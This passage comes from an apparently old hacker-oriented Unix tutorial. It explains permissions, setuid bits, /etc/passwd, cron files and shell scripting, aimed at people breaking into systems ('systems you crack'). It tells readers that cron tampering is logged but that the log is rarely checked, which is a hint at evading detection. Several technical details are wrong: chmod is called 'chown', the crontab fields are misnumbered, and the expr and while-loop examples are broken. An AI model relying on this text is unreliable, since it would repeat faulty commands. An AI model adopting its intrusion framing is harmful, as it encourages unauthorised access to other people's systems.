  773.         Unix has three different file/directory permissions: read, write, and 
  774. execute. This how these permissions affect access to files:
  775.  
  776. read    -Allows a user to view the contents of the file.
  777. write   -Allows a user to change the contents of a file.
  778. execute -Allows a user to execute a file (if it is an executable type of file;
  779.         if it isn't, the user will get an error when trying to execute it).
  780.  
  781. This is how these permissions affect access to directories:
  782.  
  783. read    -Allows a user to list out the files in a directory (ls).
  784. write   -Allows a user to save and delete files in this directory.
  785. execute -If a user has execute access to a directory, he can go to that dir-
  786.         ectory with the cd command. If he also has read permission to that dir-
  787.         ectory, he can also copy files from it and gain information on the 
  788.         permissions for that directory and the files it contains, with the "l"
  789.         option to the ls command, which will be explained soon.
  790.  
  791.         Unix divides users into 3 classes: user (the owner of the file or dir-
  792. ectory), group (members of the owner's group), and other (anyone who doesn't 
  793. fit into the first two classes). You can specify what permissions to give to a 
  794. file for each class of user.
  795.         To show the permissions of the files in a directory, use "ls -l". This 
  796. will list the contents of the directory (as in ls), and will show each's 
  797. permissions. For example:
  798.         $ls
  799.         bin     startrek
  800.         $ ls -l
  801.         drwxrwxrwx   1   bin      sys 12345   Mar 10  01:30   bin
  802.         -rwxr-xr--   1   guest  users   256   Mar 20  02:25   startrek
  803.  
  804.         In the above example, the directory we are in contains a subdirectory 
  805. called bin and a file called "startrek". Here is an explantion of the fields:
  806. The first field contains the file's type and permissions. Look at the first 
  807. field of the first line, "drwxrwxrwx". Note the "d" at the begginning. Then see 
  808. the "-" at the begginging of the first field for the file startrek. This shows 
  809. the file type. "D" is a directory. "-" is a file. "c" is a device file. Now, 
  810. back to the first field of the first line again. Notice the "rwxrwxrwx". These 
  811. are the permissions. The permissions are divided into three groups:
  812. [user][group][other]. R stands for read, w stands for write, and x stand for 
  813. execute. "rwxrwxrwx" means that all three classes of users, owner, group, and 
  814. other, have read, write, and execute permissions to the directory bin. Now look 
  815. at the second line. It reads "rwxr-xr--". Notice the "-"'s in the place of some 
  816. of the permissions. This means that the file was not given that permission. 
  817. Line 2 shows that the owner has read, write, and execute permissions for the 
  818. file startrek, members of the owner's group have read and execute permissions 
  819. but not write (notice the "-" in the place of the group part's w), and all 
  820. others have only read privileges ("r--"...there are hyphens in the place of the 
  821. others part's w and x). 
  822.         Now, let's look at the other fields. The second field is a number (in 
  823. this case, the number is one for each line). This shows the number of copies of 
  824. this file on the system. The third field shows the name of the owner of file 
  825. (or directory). The fourth field shows the username of the owner of the file. 
  826. The fifth field, which is not shown on some systems, shows the name of the 
  827. owner's group.The sixth field shows the size of the file. the seventh field 
  828. shows the time and date the file was last modified. the last field shows the 
  829. name of the file or directory.
  830.         The command used to change file/directory permissions is chmod. There 
  831. are 2 ways to change permissions: symbolically and absolutely. This will 
  832. explain both.
  833.         When you change permissions symbolically, only the permissions you 
  834. specify to be added or deleted will be changed. The other permissions will 
  835. remain as they are. The format is:
  836. chown [u, g, or o] [+ or -] [rwx] [file/directory name]
  837. The following abbreviations are used:
  838. u       -User (the file or directory's owner)
  839. g       -Group (members of the owner's group)
  840. o       -Others (all others)
  841. r       -Read permission
  842. w       -Write permission
  843. x       -Execute permission
  844.  
  845. You use u, g, and o to specify which group you wish to change the privileges 
  846. for. To add a permission, type "chown [class]+[permissions] [filename]". For 
  847. instance, to add group write permissions to the file startrek, type "chown g+w 
  848. startrek". To delete permissions, use the "-". For instance, to remove the 
  849. owner's write access to the file "startrek", type "chown u-w startrek".
  850.  
  851.         When you set file permissions absolutely, any permissions that you do 
  852. not give the file or directory are automatically deleted. The format for 
  853. setting permissions absolutely is "chown [mode number] filename". You determine 
  854. the mode number by adding together the code numbers for the permissions you 
  855. wish to give the file. Here are the permissions and their numbers:
  856.  
  857. Others execute permission       1
  858. Others write permission         2
  859. Others read permission          4
  860.  
  861. Group execute permission        10
  862. Group write permission          20
  863. Group read permission           40
  864.  
  865. User (owner) execute permission 100
  866. User (owner) write permission   200
  867. User (owner) read permission    400
  868.  
  869.         There are also two special file modes that can be set only absolutely. 
  870. These are the UID and GID modes. The UID mode, when applied to an executable 
  871. file, means that when another user executes the file, he executes it under the 
  872. user number of the owner (in other words, he runs the program as if he were the 
  873. owner of the file). If the file has its GID mode bit set, then when someone 
  874. executes the file, his group will temporarily be changed to that of the file's 
  875. owner. The permission number for the GID mode is 2000, and the number for the 
  876. UID mode is 4000. If the uid bit is set, there will be an "S" in the place of 
  877. the x in the owner permissions section when you check a file's permissions:
  878. -rwSr-xr-x
  879. If the uid bit is set, and the owner of the file has execute permissions, the S 
  880. will not be capitalized:
  881. -rwsr-xr-x
  882. If the gid bit is set, the same applies to the x in the section on group 
  883. permissions.
  884.         A short note here is in order on how these permissions affect superuser 
  885. accounts. They don't-unless the owner of the file is root. All superuser 
  886. accounts have the same user number, which means that the system considers them 
  887. all to be the same-that is, they are considered to be the root account. Thus, 
  888. superuser accounts are only bound by the protections of files and directories 
  889. that they own, and they can easily change the permissions of any files and 
  890. directories that they do not have the access to that they wish.
  891.  
  892. SPECIAL UNIX FILES
  893. ------------------
  894.         This section will detail the purposes of some files that are found on 
  895. all systems. There are quite a few of these, and knowing their uses and what 
  896. format their entries are in is very useful to the hacker.
  897.  
  898. THE FILES
  899. ---------
  900.  
  901. /etc/passwd     -This is the password file, and is THE single most important 
  902.                 file on the system. This file is where information on the
  903.                 system's accounts are stored. Each entry has 7 fields:
  904.                 
  905.                 username:password:user#:group#:description:home dir:shell
  906.  
  907.                 The first field, naturally, is the account's username. The
  908.                 second field is the account's password (in an encrypted form).
  909.                 If this field is blank, the account doesn't have a password. 
  910.                 The next field is the account's user number. The fourth field
  911.                 is the account's group number. The fifth field is for a
  912.                 description of the account. This field is used only in the
  913.                 password file, and is often just left blank, as it has no
  914.                 significance. The sixth field is the pathname of the account's
  915.                 home directory, and the last field is the pathname of the 
  916.                 account's shell program. Sometimes you may see an account with
  917.                 a program besides the standard shell programs (sh, csh, etc.)
  918.                 as its shell program. These are "command logins". These 
  919.                 accounts execute these programs when logging in. For example,
  920.                 the "who" command login would have the /bin/who program as its
  921.                 shell.
  922.                 Here is a typical-looking entry:
  923.  
  924.                 root:hGBfdJYhdhflK:0:1:Superuser:/:/bin/sh
  925.  
  926.                 This entry is for the root account. Notice that the encrypted 
  927.                 form of the password is 13 characters, yet the Unix passwords
  928.                 are only 11 characters maximum. The last 2 characters are what
  929.                 is called a "salt string", and are used in the encryption
  930.                 process, which will be explained in more detail later. Now,
  931.                 notice the user number, which is zero. Any account with a user
  932.                 number of 0 has superuser capabilities. The group number is 1.
  933.                 The account description is "superuser". The account's home dir-
  934.                 ectory is the root directory, or "/". The account's shell is
  935.                 the bourne shell (sh), which is kept in the directory /bin.
  936.                 Sometimes you may see an entry in the password field like this:
  937.                 :NHFfnldyNjh,21AB:
  938.                 Notice the period after the 13th character, followed by 2
  939.                 digits and 2 letters. If an account has an entry like this, the
  940.                 account has a fixed expiration date on its password. The first
  941.                 digit, in this case 2, shows the maximum number of weeks that
  942.                 the account can keep the same password. The second digit shows
  943.                 how many weeks must pass before the account can change its 
  944.                 password. (This is to prevent users from using the same old
  945.                 password constantly by changing the password when forced to and
  946.                 then changing it back immediately.) The last 2 characters are
  947.                 an encrypted form of when the password was last changed.
  948.                 Other unusual password field entries you might encounter are:
  949.                 ::
  950.                 :,21:
  951.                 The first entry means that the account has no password. The
  952.                 second entry means that the account has no password yet, but
  953.                 has a fixed expiration date that wil begin as soon as a pass-
  954.                 word is given to it.
  955.                         Now, for an explanation of how the Unix system encrypts
  956.                 the passwords. The first thing any hacker thinks of is trying
  957.                 decrypt the password file. This is as close to impossible as
  958.                 anything gets in this world. I've often heard other "hackers"
  959.                 brag about doing this...this is the biggest lie since Moses
  960.                 said "I did it". The encryption scheme is a variation on the
  961.                 DES (Data Encryption Standard). When you enter the command
  962.                 passwd (to change the password), the system will form a 2
  963.                 character "salt string" based on the process number of the 
  964.                 password command you just issued. This 2-character string pro-
  965.                 duces a slight change in the way the password is encrypted.
  966.                 There are a total of 4096 different variations on the
  967.                 encryption scheme caused by different salt string characters.
  968.                 This is NOT the same encryption scheme used by the crypt
  969.                 utility. The password is NEVER decrypted on the system. When
  970.                 you log on, the password you enter at the password prompt is
  971.                 encrypted (the salt string is taken from the password file)
  972.                 and compared to the encrypted entry in the password file. The
  973.                 system generates its own key, and as of yet, I have not
  974.                 discovered any way to get the key. The login program does
  975.                 not encrypt the password you enter itself, it does so, I 
  976.                 believe, by a system call.
  977.  
  978. /etc/group      -This is the group file. This allows the superuser to give
  979.                 certain accounts group access to groups other than their own.
  980.                 Entries are in the format:
  981.                
  982.                group name:password:group number:users in this group
  983.  
  984.                 The first field is the name of the group. The second is the
  985.                 field for the group password. In all my experience with Unix,
  986.                 I have never seen the password feature used. The third is the
  987.                 group's number. The fourth field is a list of the users who
  988.                 group access to this group. (Note: this can include users whose
  989.                 group number is different from the number of the group whose
  990.                 entry you are reading in the group file.) The usernames are
  991.                 separated by commas. Here's an example:
  992.  
  993.                 sys::2:root,sys,adm,lp
  994.  
  995.                 To change to a new group identity, type "newgrp [group]". If
  996.                 the group has a password, you must enter the proper password.
  997.                 You cannot change to another group if you are not listed as a
  998.                 member of that group in the group file.
  999.                 
  1000.  
  1001. /dev/console    -This is the device file for the system console, or the
  1002.                 system's main terminal.
  1003.  
  1004. /dev/tty##      -The device files for the system's terminals are usually in
  1005.                 the form tty##, such as tty09, and sometimes ttyaa,ttyab, etc.
  1006.                 Some ways to make use of the Unix system's treatment of devices
  1007.                 as files will be explored in the section on Hacking Unix. When
  1008.                 these files are not in use by a user (in other words, no one's
  1009.                 logged onto this terminal), the file is owned by root. While a
  1010.                 user is logged onto a terminal, however, ownership of its 
  1011.                 device file is temporarily transferred to that account.
  1012.  
  1013. /dev/dk##       -These are the device files for the system's disks.
  1014.  
  1015. login files     -There are special files that are in a user's home directory
  1016.                 that contain commands that are executed when the user logs in.
  1017.                 The name of the file depends on what shell the user is using.
  1018.                 Here are the names of the files for the various shells:
  1019.                 
  1020.                 Shell           File
  1021.                 -----           ----
  1022.                 sh              .profile
  1023.                 csh             .cshrc
  1024.                 ksh             .login
  1025.                 rsh             .profile
  1026.  
  1027.                 Some systems also use a file called ".logout" that contains
  1028.                 commands which are executed upon logoff.
  1029.                         These types of files are called shell scripts, and will
  1030.                 will be explained in the section on Unix Software Development's
  1031.                 explanation of shell programming.
  1032. /usr/adm/sulog  -This is a log of all attempted uses of the su utility. It
  1033.                 shows when the attempt was made, what account made it, and
  1034.                 which account the user attempted to assume, and whether or not
  1035.                 the attempt was successful.
  1036. /usr/adm/loginlog
  1037.      or
  1038. /usr/adm/acct/sum/loginlog- This is a log of all logins to the system. This
  1039.                 only includes the time and the account's username.
  1040.  
  1041. mbox            -These are files in the home directories of the system's users,
  1042.                 that contain all the mail messages that they have saved.
  1043.  
  1044. /usr/mail/<user>        -These files in the directory /usr/mail are named after
  1045.                         system accounts. They contain all the unread mail for
  1046.                         the account they are named after.
  1047. /dev/null       -This is the null device file. Anything written to this file is
  1048.                 just lost forever. Any attempt to read this file will result in
  1049.                 an immediate control-D (end of file) character.
  1050. /tmp    -The directory /tmp provides storage space for temporary files created
  1051.         by programs and other processes. This directory will always have
  1052.         rwxrwxrwx permissions. Examining these files occasionally reveals some
  1053.         interesting information, and if you know what program generates them
  1054.         and the format of the information in the file, you could easily change
  1055.         the info in the files, thereby changing the outcome of the program.
  1056.  
  1057. THE CRON UTILITIES
  1058. ------------------
  1059.         An understanding of the cron utilities will be necessary to understand 
  1060. certain parts of the section on Hacking Unix. This section will give a detailed 
  1061. explanation of the workings of the cron utilities.
  1062.         The cron utility is a utility which carries out tasks which must be
  1063. performed on a periodic basis. These tasks, and the times when they are to be 
  1064. carried out, are kept in files in 2 directories: /usr/lib and 
  1065. /usr/spool/cron.
  1066.         The file crontab in the directory /usr/lib contains entries for system 
  1067. tasks that must be performed on a periodic basis. The format for the entries in 
  1068. this file is:
  1069.  
  1070. minute hour dayofmonth  monthofyear  dayofweek commandstring
  1071.  
  1072. The first field is the minutes field. This is a value from 0-59.
  1073. The second field is the hour field, a value from 0-23.
  1074. The third field is the day of the month, a value from 1-31.
  1075. The fifth field is the month of the year, a value from 1-2.
  1076. The sixth field is the day of the week, a value from 1-7, with monday being 1.
  1077. The seventh field is the pathname and any arguments of the task to be carried 
  1078. out.
  1079.  
  1080. An asterisk in a field means to carry out the task for every value of that 
  1081. field. For instance, an asterisk in the minutes field would mean to carry out 
  1082. that task every minute. Here's an example crontab entry:
  1083.  
  1084. 0 1 * * *  /bin/sync
  1085.  
  1086. This runs sync command, which is kept in the directory bin, at 1 am every day.
  1087. Commands in the file /usr/lib/crontab are performed with root privileges.
  1088.         in the directory /usr/spool/crontabs, you will find files named after 
  1089. system accounts. These files contain cron entries which are the same as those 
  1090. in the file /usr/lib/crontab, but are carried out under the id of the user the 
  1091. file is named after. The entries are in the same format.
  1092.  
  1093. BEWARE! When modifying cron files- cron activity is logged! All cron activity 
  1094. is logged in the file /usr/adm/cronlog. I've found, however, that on most 
  1095. systems, this file is almost never checked.
  1096.  
  1097. UNIX SOFTWARE DEVELOPMENT
  1098. -------------------------
  1099.         The Unix operating system was initially created as an enviroment for 
  1100. software development, and that remains its main use. This section will detail 
  1101. some of the os's main facilities for software development, the C compiler and 
  1102. shell programming, and their related utilities. A few of the other languages 
  1103. will be briefly touched upon at the end of this section, also.
  1104.  
  1105. SHELL PROGRAMMING
  1106. -----------------
  1107.         The shell is more than a simple command interpreter. It is also a 
  1108. sophisticated programming tool, with variables, control structures, and the 
  1109. features of just about any other programming language. Shell programs are 
  1110. called scripts. Scripts are just text files which contain the names of commands 
  1111. and programs. When the script is executed, the command and programs whose names 
  1112. it contains are executed as if you had typed in their names from your keyboard. 
  1113. There are two ways to execute a shell script: if you have execute permission to 
  1114. it, you can simply type in its name. Otherwise, (if you have read access to 
  1115. it), you can type "sh [filename]". Here is a sample shell script:
  1116.  
  1117. who
  1118. whoami
  1119.  
  1120. As you can see, it contains the commands who and whoami. When you execute it, 
  1121. you will see a list of the system's current users (the output of the who 
  1122. command), and which account you are logged in under (the output of the whoami 
  1123. command).
  1124.         This will concentrate solely on shell programming. While shell 
  1125. programming is essentially the same with all the shells, there are slight 
  1126. syntax differences that make shell scripts incompatible with shells that they 
  1127. were not specifically written for.
  1128.  
  1129. SHELL VARIABLES
  1130. ---------------
  1131.         Like any programming language, the shell can handle variables. To set 
  1132. the value of a variable, type:
  1133.  
  1134. [variable]=[value]
  1135.  
  1136. For example:
  1137.  
  1138. counter=1
  1139.  
  1140. This will assign the value "1" to the variable counter. If the variable counter 
  1141. does not already exist, the shell will create it. Note, that there are no 
  1142. "numeric" variables in shell programming- all the variables are strings. For 
  1143. instance, we could later type:
  1144.  
  1145. counter=This is a string
  1146.  
  1147. And counter would now be equal to "This is a string". There is a command called 
  1148. "expr", however, that will let you treat a variable as a numeric value, and 
  1149. will be explained later.
  1150.         When setting the value of a variable, you only use the variable name. 
  1151. When you specify a variable as an argument to a command or program, however, 
  1152. you must precede the variable with a dollar sign. For instance:
  1153.  
  1154. user=root
  1155.  
  1156. Now, we want to specify user as an argument to the command "ps -u". We would 
  1157. type:
  1158.  
  1159. ps -u$user
  1160.  
  1161. Which would, of course, display the processes of the user "root".
  1162.  
  1163. SPECIAL SHELL VARIABLES
  1164. -----------------------
  1165.         There are certain vaiables which are already pre-defined by the shell, 
  1166. and have special meaning to it. Here is a list of the more important ones and 
  1167. their meanings to the shell:
  1168.  
  1169. HOME    -(Notice the caps. All pre-defined variables are in all-caps.) This
  1170.         variable contains the pathname of the user's home directory.
  1171.  
  1172. PATH    -This is a good time to explain something which makes Unix a very
  1173.         unique operating system. In Unix, there are no commands "built-in" to
  1174.         the operating system. All the commands are just regular programs. The
  1175.         PATH variable contains a list of the pathnames of directories. When you
  1176.         type in the name of a command or program, the shell searches through
  1177.         the directories listed in the PATH variable (in the order specified in
  1178.         the variable) until it finds a program with the same name as the name
  1179.         you just typed in. The format for the list of directories in the PATH
  1180.         variable is:
  1181.         
  1182.         [pathname]:[pathname]:[pathname]...
  1183.  
  1184.         For example, the default searchpath is usually:
  1185.  
  1186.         /bin:/usr/bin:/usr/local
  1187.  
  1188.         A blank entry in the pathname, or an entry for ".", means to check the
  1189.         directory the user is currently in. For instance, all these paths
  1190.         contain blank or "." entries:
  1191.  
  1192.         .:/bin:/usr/bin         [Notice . at begginning of path]
  1193.         :/bin:/usr/bin          [Notice that path begins with :]
  1194.         /bin:/usr/bin:          [Note that path ends with :    ]
  1195.  
  1196. PS1     -This variable contains the shell prompt string. The default is usually
  1197.         "$" ("&" if you're using BSD Unix). If you have the "&" prompt, and
  1198.         wish to have the dollar sign prompt instead, just type:
  1199.  
  1200.         PS1=$
  1201.  
  1202. TERM    -This contains the type of terminal you are using. Common terminal
  1203.         types are:
  1204.         
  1205.         ansi    vt100   vt52    vt200   ascii   tv150
  1206.  
  1207.         And etc... Just type "TERM=[termtype]" to set your terminal type.
  1208.  
  1209. COMMAND LINE VARIABLES
  1210. ----------------------
  1211.         Command line variables are variables whose values are set to arguments 
  1212. entered on the command line when you execute the shell script. For instance, 
  1213. here is a sample shell script called "repeat" that uses command line variables:
  1214.  
  1215. echo $1
  1216. echo $2
  1217. echo $3
  1218.  
  1219. The echo command prints out the values following it. In this case, it will 
  1220. print out the values of the variables $1, $2, and $3. These are the command 
  1221. line variables. For instance, $1 contains the value of the first argument you 
  1222. entered on the command line, $2 contains the second, $3 contains the third, an 
  1223. so on to infinity. Now, execute the script:
  1224.  
  1225. repeat apples pears peaches
  1226.  
  1227. The output from the "repeat" shell script would be:
  1228.  
  1229. apples
  1230. pears
  1231. peaches
  1232.  
  1233. Get the idea?
  1234.  
  1235. SPECIAL COMMAND LINE VARIABLES
  1236. ------------------------------
  1237.         There are 2 special command line variables, $O and $#. $O contains the 
  1238. name of command you typed in (in the last example, $O would be repeat). $# 
  1239. contains the number of arguments in the command line. (In the last example, $# 
  1240. would be 3.)
  1241.  
  1242. SPECIAL COMMANDS FOR SHELL PROGRAMS
  1243. -----------------------------------
  1244.         These commands were added to the Unix os especially for shell 
  1245. programming. This section will list them, their syntax, and their uses.
  1246.  
  1247. read    -This command reads the value of a variable from the terminal. The
  1248.         format is: "read [variable]". For example, "read number". The variable
  1249.         is not preceded by a dollar sign when used as an argument to this com-
  1250.         mand.
  1251.  
  1252. echo    -This command displays information on the screen. For example,
  1253.         "echo hello" would display "hello" on your terminal. If you specify
  1254.         a variable as an argument, it must be preceded by a dollar sign, for
  1255.         example "echo $greeting".
  1256.  
  1257. trap    -This command traps certain events, such as the user being disconnected
  1258.         or pressing the break key, and tells what commands to carry out if they
  1259.         occur. The format is: trap "commands" eventcodes. the event codes are:
  1260.         2 for break key, and 1 for disconnect. You can specify multiple com-
  1261.         mands with the quotation marks, separating the commands with a semi-
  1262.         colon (";"). For example:
  1263.  
  1264.         trap "echo 'hey stupid!'; echo 'don't hit the break key'" 2
  1265.  
  1266.         Would echo "Hey stupid!" and "Don't hit the break key" if the user hits
  1267.         the break key while the shell script is being executed.
  1268.  
  1269. exit    -This command terminates the execution of a shell procedure, and ret-
  1270.         urns a diagnostic value to the enviroment. The format is:
  1271.         "exit [value]", where value is 0 for true and 1 for false. The meaning
  1272.         of the value parameter will become clear later, in the section on
  1273.         the shell's provisions for conditional execution. If the shell script
  1274.         being executed is being executed by another shell script, control is
  1275.         passed to the next highest shell script.
  1276.  
  1277. ARITHMETIC WITH EXPR
  1278. --------------------
  1279.         The expr command allows you to perform arithmetic on the shell 
  1280. variables, and sends the output to the screen. (Though the output may be 
  1281. redirected.) The format is:
  1282.  
  1283. expr [arg] [function] [arg] [function] [arg]...
  1284.  
  1285. Where [arg] may be either a value, or a variable (preceded by a dollar sign), 
  1286. and [function] is an arithmetic operation, one of the following:
  1287.  
  1288. +       -Add.
  1289. -       -Subtract.
  1290. \*      -Multiply.
  1291. /       -Divide.
  1292. %       -Remainder from a division operation.
  1293.  
  1294. For example:
  1295.  
  1296. $ num1=3
  1297. $ num2=5
  1298. $ expr num1 + num2
  1299.  8
  1300. $
  1301.  
  1302. TEXT MANIPULATION WITH SORT
  1303. ---------------------------
  1304.         The sort command sorts text by ASCII or numeric value. The command 
  1305. format is:
  1306.  
  1307. sort [field][option]... file
  1308.  
  1309. where file is the file you wish to sort. (The sort command's input may be 
  1310. redirected, though, just as its output, which is ordinarily to the screen, can 
  1311. be.) The sort command sorts by the file's fields. If you don't specify any 
  1312. specific field, the first field is assumed. for example, say this file 
  1313. contained names and test scores:
  1314.  
  1315. Billy Bob       10
  1316. Tom McKann      5
  1317. Doobie Kairful  20
  1318.  
  1319. the file's fields would be first name, last name, and score. So, to sort the 
  1320. above file (called "students") by first name, you would issue the command:
  1321.  
  1322. sort students
  1323.  
  1324. And you would see:
  1325.  
  1326. Billy Bob       10
  1327. Doobie Kairful  20
  1328. Tom McKann      5
  1329.  
  1330. If you wanted to sort the file's entries by another field, say the second field 
  1331. of the file "students" (last names), you would specify:
  1332.  
  1333. sort +1 students
  1334.  
  1335. The +1 means to skip ahead one field and then begin sorting. Now, say we wanted 
  1336. to sort the file by the 3rd field (scores). We would type:
  1337.  
  1338. sort +2 students
  1339.  
  1340. to skip 2 fields. But the output would be:
  1341.  
  1342. Billy Bob       10
  1343. Tom McKann      5
  1344. Doobie Kairful  20
  1345.  
  1346. Notice that the shorter names came first, regardless of the numbers in the 
  1347. second field. There is a reason for this- the spaces between the second and 3rd 
  1348. fields are considered to be part of the 3rd field. You can tell the sort 
  1349. command to ignore spaces when sorting a field, however, using the b option. The 
  1350. format would be:
  1351.  
  1352. sort +2b students
  1353.  
  1354. but...another error! The output would be:
  1355.  
  1356. Billy Bob       10
  1357. Doobie Kairful  20
  1358. Tom McKann      5
  1359.  
  1360. Why did the value 5 come after 10 and 20? Because the sort command wasn't 
  1361. really sorting by numeric value- it was sorting by the ASCII values of the 
  1362. characters in the third field, and 5 comes after the digits 1 and 2. We could 
  1363. specify that the field be treated by its numerical value by specifying the n 
  1364. option:
  1365.  
  1366. sort +2n students
  1367.  
  1368. Output: 
  1369.  
  1370. Tom McKann      5
  1371. Billy Bob       10
  1372. Doobie Kairful  20
  1373.  
  1374. Notice that if we use the n option, blanks are automatically ignored.
  1375.  
  1376. We can also specify that sort work in the reverse order on a field. For 
  1377. example, if we wanted to sort by last names in reverse order:
  1378.  
  1379. sort +1r students
  1380.  
  1381. Output:
  1382.  
  1383. Tom McKann      5
  1384. Doobie Kairful  20
  1385. Billy Bob       10
  1386.  
  1387. By using pipes, you can direct the output of one sort command to the input of 
  1388. yet another sort command, thus allowing you to sort a file by more than one 
  1389. field. This makes sort an excellent tool for text manipulation. It is not, 
  1390. however, the only one. Remember, you can use any Unix command or program in a 
  1391. shell script, and there are many different commands for text manipulation in 
  1392. Unix, such as grep (described in an earlier section on basic commands). 
  1393. Experiment with the different commands and ways of using them.
  1394.  
  1395. LOOPING
  1396. -------
  1397.         The for/do loop is a simple way to repeat a step for a certain number 
  1398. of times. The format is:
  1399.  
  1400. for [variable] in [values]
  1401. do [commands]
  1402. done
  1403.  
  1404. You do not precede the variable with a dollar sign in this command. The for/do 
  1405. loop works by assigning the variable values from the list of values given, one 
  1406. at a time. For example:
  1407.  
  1408. for loopvar in 1 2 3 5 6 7
  1409. do echo $loopvar
  1410. done
  1411.  
  1412. On the first pass of the loop, loopvar would be assigned the value 1, on the 
  1413. second pass 2, on the third pass 3, on the fourth pass 5, on the fifth pass 6, 
  1414. and on the sixth pass 7. I skipped the number 4 to show that you do not have to 
  1415. use values in numerical order. In fact, you don't have to use numerical 
  1416. arguments. You could just as easily have assigned loopvar a string value:
  1417.  
  1418. for loopvar in apples peaches pears
  1419. do echo "This pass's fruit is:"
  1420.    echo $loopvar
  1421. done
  1422.  
  1423. Note that you can also specify multiple commands to be carried out in the do 
  1424. portion of the loop.
  1425.  
  1426. SELECTIVE EXECUTION WITH CASE
  1427. -----------------------------
  1428.         The case command allows you to execute commands based on the value of a 
  1429. variable. The format is:
  1430.  
  1431. case [variable] in
  1432.  
  1433.         [value])        commands
  1434.                         commands
  1435.                         commands;;
  1436.        [value2])        commands
  1437.                         commands;;
  1438.        [value3])        ...and so on
  1439.         esac
  1440.  
  1441. For example:
  1442.  
  1443. case $choice in
  1444.         1)      echo "You have chosen option one."
  1445.                 echo "This is not a good choice.";;
  1446.  
  1447.         2)      echo "Option 2 is a good choice.";;
  1448.  
  1449.         *)      echo "Invalid option.";;
  1450.         esac
  1451.  
  1452. Now, to explain that:
  1453.         If the variable choice's value is "1", the commands in the section for 
  1454. the value 1 are carried out until a pair of semicolons (";;") is found. The 
  1455. same if the value of choice is "2". Now, note the last entry, "*". This is a 
  1456. wildcard character. This means to execute the commands in this section for any 
  1457. other value of choice. Easac signals the end of the list of execution options 
  1458. for case.
  1459.  
  1460. DETERMINING TRUE/FALSE CONDITIONS WITH TEST
  1461. -------------------------------------------
  1462.         The test command tests for various conditions of files and variables 
  1463. and returns either a true value (0) or a false value (1), which is used in 
  1464. conjuction with the if/then statements to determine whether or not a series of 
  1465. commands are executed. There are several different formats for test, depending 
  1466. on what kind of condition you are testing for. When using variables with test, 
  1467. you must always precede the variable with a dollar sign.
  1468.  
  1469. NUMERIC TESTS
  1470. -------------
  1471. Format:
  1472. test [arg1] option [arg2]
  1473.  
  1474. the arguments can either be numbers or variables.
  1475.  
  1476. OPTIONS         TESTS TRUE IF
  1477. -------         -------------
  1478. -eq             arg1=arg2
  1479. -ne             arg1<>arg2
  1480. -gt             arg1>arg2
  1481. -lt             arg1<arg2
  1482. -ge             arg1>=arg2
  1483. -le             arg1<=arg2
  1484.  
  1485. FILETYPE TESTS
  1486. -------------
  1487. Format:
  1488. test [option] file or directory name
  1489.  
  1490. OPTIONS         TESTS TRUE IF
  1491. -------         -------------
  1492. -s              file or directory exists and is not empty
  1493. -f              the "file" is a file and not a directory
  1494. -d              the "file" is really a directory
  1495. -w              the user has write permission to the file/directory
  1496. -r              the user has read permission to the file/directory
  1497.  
  1498. CHARACTER STRING TESTS
  1499. ----------------------
  1500. Format:
  1501. test [arg1] option [arg2]
  1502. The arguments can be either strings of characters or variables with character 
  1503. string values.
  1504.  
  1505. OPTIONS         TESTS TRUE IF
  1506. -------         -------------
  1507. =               arg1=arg2
  1508. !=              arg<>arg2
  1509.  
  1510. A note here about string tests. You must enclose the names of the variables in 
  1511. quotation marks (like "$arg1") if you wish the test to take into consideration 
  1512. spaces, otherwise space characters are ignored, and "    blue" would be 
  1513. considered the same as "blue".
  1514.  
  1515. TESTING FOR THE EXISTANCE OF A STRING OF CHARACTERS
  1516. ---------------------------------------------------
  1517. Format:
  1518. test [option] arg
  1519. Arg is a variable.
  1520.  
  1521. OPTIONS         TESTS TRUE IF
  1522. -------         -------------
  1523. -z              variable has a length of 0
  1524. -n              variable has a length greater than 0
  1525.  
  1526. COMBINING TESTS WITH -A AND -O
  1527. ------------------------------
  1528.         These options stand for "and" (-a) and "or" (-o). They allow you to 
  1529. combine tests, for example:
  1530.  
  1531. test arg1 = arg2 -o arg1 = arg3
  1532.  
  1533. means that a true condition is returned if arg1=arg2 or arg1=arg3.
  1534.  
  1535.  
  1536. CONDITIONAL EXECUTION WITH IF/THEN/ELSE/ELIF
  1537. --------------------------------------------
  1538. Format:
  1539. if [this condition is true]
  1540. then [do these commands]
  1541. fi
  1542.  
  1543. Example:
  1544.  
  1545. if test arg1 = arg2
  1546. then echo "argument 1 is the same as argument 2"
  1547. fi
  1548.  
  1549. This is pretty much self-explanatory. If the condition test on the if line 
  1550. returns a true value, the the commands following "then" are carried out until 
  1551. the fi statement is encountered.
  1552.  
  1553. Format:
  1554. if [this condition is true]
  1555. then [do these commands]
  1556. else [do these commands]
  1557. fi
  1558.  
  1559. Again, pretty much self explanatory. The same as the above, except that if the 
  1560. condition isn't true, the commands following else are carried out, until fi is 
  1561. encountered.
  1562.  
  1563. Format:
  1564. if [this condition is true]
  1565. then [do these commands]
  1566. elif [this condition is true]
  1567. then [do these commands]
  1568. fi
  1569.  
  1570. The elif command executes another condition test if the first condition test is 
  1571. false, and if the elif's condition test returns a true value, the command for 
  1572. its then statement are then carried out. Stands for "else if".
  1573.  
  1574. WHILE/DO LOOPS
  1575. --------------
  1576. Format:
  1577. while [this condition is true]
  1578. then [do these commands]
  1579. done
  1580.  
  1581. Repeats the commands following "then" for as long as the condition following 
  1582. "while" is true. Example:
  1583.  
  1584. while test $looper != "q"
  1585. then read looper
  1586.      echo $looper
  1587. done
  1588.  
  1589. while will read the value of the variable looper from the keyboard and display 
  1590. it on the screen, and ends if the value of looper is "q".
  1591.  
  1592. SUMMARY
  1593. -------
  1594.         This small tutorial by no means is a complete guide to shell 
  1595. programming. Look at shell scripts on the systems you crack and follow their 
  1596. examples. Remember, that you can accomplish a great deal by combining the 
  1597. various control structures (such as having an if/then conditional structure 
  1598. call up a while/do loop if the condition is true, etc.) and by using I/O 
  1599. redirection, pipes, etc. My next Unix file will cover more advanced shell 
  1600. programming, and examine shell programming on another popular shell, the 
  1601. Berkely C shell.
  1602.  
  1603. THE C COMPILER
  1604. --------------
  1605.         C is sort of the "official" language of Unix. Most of the Unix 
  1606. operating system was written in C, and just about every system I've ever been 
  1607. on had the C compiler. The command to invoke the c compiler is cc. The format 
  1608. is "cc [filename]", where filename is the name of the file which contains the 
  1609. source code. (The filename must end in .c) You can create the source code file 
  1610. with any of the system's text editors. The include files, stdio.h and others, 
  1611. are kept in a directory on the system. You do not have to have a copy of 
  1612. these files in your current directory when you compile the file, the compiler 
  1613. will search this directory for them. If you wish to include any files not in 
  1614. the include library, they must be in your current directory. The compiled 
  1615. output will be a file called "a.out" in your current directory.
